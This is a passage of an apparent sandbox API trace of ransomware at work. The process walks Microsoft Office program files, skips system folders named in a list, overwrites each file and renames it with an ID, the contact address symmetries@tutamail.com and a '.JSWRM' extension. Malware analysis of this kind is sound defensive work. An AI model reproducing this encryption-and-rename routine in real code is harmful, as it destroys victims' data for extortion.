Flags=0x0, Size=0x90) returned 0x2101f0 [0113.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0113.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0113.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0113.075] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11699072, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11699072, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11699072, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1779d4, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Lync.x-none.msi.16_mondoww.mcxml", cAlternateFileName="LYNCX-~1.MCX")) returned 1 [0113.075] lstrcmpiW (lpString1="Lync.x-none.msi.16_mondoww.mcxml", lpString2=".") returned 1 [0113.075] lstrcmpiW (lpString1="Lync.x-none.msi.16_mondoww.mcxml", lpString2="..") returned 1 [0113.075] lstrcmpiW (lpString1="Lync.x-none.msi.16_mondoww.mcxml", lpString2="...") returned 1 [0113.075] lstrcmpiW (lpString1="Lync.x-none.msi.16_mondoww.mcxml", lpString2="windows") returned -1 [0113.075] lstrcmpiW (lpString1="Lync.x-none.msi.16_mondoww.mcxml", lpString2="recovery") returned -1 [0113.075] lstrcmpiW (lpString1="Lync.x-none.msi.16_mondoww.mcxml", lpString2="perflogs") returned -1 [0113.075] lstrcmpiW (lpString1="Lync.x-none.msi.16_mondoww.mcxml", lpString2="documents and settings") returned 1 [0113.075] lstrcmpiW (lpString1="Lync.x-none.msi.16_mondoww.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.075] lstrcmpiW (lpString1="Lync.x-none.msi.16_mondoww.mcxml", lpString2="system volume information") returned -1 [0113.075] lstrcmpiW (lpString1="Lync.x-none.msi.16_mondoww.mcxml", lpString2="msocache") returned -1 [0113.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0113.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lync.x-none.msi.16_mondoww.mcxml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0113.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lync.x-none.msi.16_mondoww.mcxml", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lync.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 32 [0113.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0113.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0113.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lync.x-none.msi.16_mondoww.mcxml", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0113.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lync.x-none.msi.16_mondoww.mcxml", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lync.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 32 [0113.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0113.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0113.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0113.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0113.127] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Lync.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\lync.x-none.msi.16_mondoww.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.128] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1538516) returned 1 [0113.128] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.128] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.142] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.142] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.142] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.142] CloseHandle (hObject=0x238) returned 1 [0113.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0113.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0113.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0113.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0113.143] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0113.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0113.143] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.143] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Lync.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\lync.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Lync.x-none.msi.16_mondoww.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\lync.x-none.msi.16_mondoww.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0113.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0113.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0113.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.144] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11699072, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11699072, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11699072, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x109e6, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Office.x-none.msi.16_authored.mcxml", cAlternateFileName="OFFICE~4.MCX")) returned 1 [0113.144] lstrcmpiW (lpString1="Office.x-none.msi.16_authored.mcxml", lpString2=".") returned 1 [0113.144] lstrcmpiW (lpString1="Office.x-none.msi.16_authored.mcxml", lpString2="..") returned 1 [0113.144] lstrcmpiW (lpString1="Office.x-none.msi.16_authored.mcxml", lpString2="...") returned 1 [0113.144] lstrcmpiW (lpString1="Office.x-none.msi.16_authored.mcxml", lpString2="windows") returned -1 [0113.145] lstrcmpiW (lpString1="Office.x-none.msi.16_authored.mcxml", lpString2="recovery") returned -1 [0113.145] lstrcmpiW (lpString1="Office.x-none.msi.16_authored.mcxml", lpString2="perflogs") returned -1 [0113.145] lstrcmpiW (lpString1="Office.x-none.msi.16_authored.mcxml", lpString2="documents and settings") returned 1 [0113.145] lstrcmpiW (lpString1="Office.x-none.msi.16_authored.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.145] lstrcmpiW (lpString1="Office.x-none.msi.16_authored.mcxml", lpString2="system volume information") returned -1 [0113.145] lstrcmpiW (lpString1="Office.x-none.msi.16_authored.mcxml", lpString2="msocache") returned 1 [0113.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0113.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_authored.mcxml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_authored.mcxml", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office.x-none.msi.16_authored.mcxml", lpUsedDefaultChar=0x0) returned 35 [0113.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0113.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0113.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_authored.mcxml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_authored.mcxml", cchWideChar=35, lpMultiByteStr=0x22ce70, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office.x-none.msi.16_authored.mcxml", lpUsedDefaultChar=0x0) returned 35 [0113.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0113.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0113.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0113.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0113.145] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_authored.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_authored.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.146] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=68070) returned 1 [0113.146] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x109e0) returned 0x24c1d0 [0113.146] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x109e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x109e0, lpOverlapped=0x0) returned 1 [0113.152] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.152] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x109e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x109e0, lpOverlapped=0x0) returned 1 [0113.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.154] CloseHandle (hObject=0x238) returned 1 [0113.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0113.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0113.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0113.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0113.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0113.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0113.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.154] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_authored.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_authored.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_authored.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_authored.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0113.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0113.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0113.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.155] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11699072, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11699072, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11699072, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2eb0, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Office.x-none.msi.16_Common.mcxml", cAlternateFileName="OFFICE~2.MCX")) returned 1 [0113.155] lstrcmpiW (lpString1="Office.x-none.msi.16_Common.mcxml", lpString2=".") returned 1 [0113.155] lstrcmpiW (lpString1="Office.x-none.msi.16_Common.mcxml", lpString2="..") returned 1 [0113.155] lstrcmpiW (lpString1="Office.x-none.msi.16_Common.mcxml", lpString2="...") returned 1 [0113.155] lstrcmpiW (lpString1="Office.x-none.msi.16_Common.mcxml", lpString2="windows") returned -1 [0113.155] lstrcmpiW (lpString1="Office.x-none.msi.16_Common.mcxml", lpString2="recovery") returned -1 [0113.155] lstrcmpiW (lpString1="Office.x-none.msi.16_Common.mcxml", lpString2="perflogs") returned -1 [0113.155] lstrcmpiW (lpString1="Office.x-none.msi.16_Common.mcxml", lpString2="documents and settings") returned 1 [0113.155] lstrcmpiW (lpString1="Office.x-none.msi.16_Common.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.155] lstrcmpiW (lpString1="Office.x-none.msi.16_Common.mcxml", lpString2="system volume information") returned -1 [0113.155] lstrcmpiW (lpString1="Office.x-none.msi.16_Common.mcxml", lpString2="msocache") returned 1 [0113.155] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0113.155] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_Common.mcxml", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0113.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_Common.mcxml", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office.x-none.msi.16_Common.mcxml", lpUsedDefaultChar=0x0) returned 33 [0113.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0113.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0113.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_Common.mcxml", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0113.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_Common.mcxml", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office.x-none.msi.16_Common.mcxml", lpUsedDefaultChar=0x0) returned 33 [0113.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0113.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0113.156] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0113.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.156] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.156] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0113.156] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_Common.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_common.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.156] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11952) returned 1 [0113.156] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2eb0) returned 0x24c1d0 [0113.157] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2eb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2eb0, lpOverlapped=0x0) returned 1 [0113.159] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.159] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2eb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2eb0, lpOverlapped=0x0) returned 1 [0113.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.160] CloseHandle (hObject=0x238) returned 1 [0113.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0113.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0113.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0113.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0113.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0113.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0113.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.160] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_Common.mcxml" (normalized: "c:\\program files\\microsoft 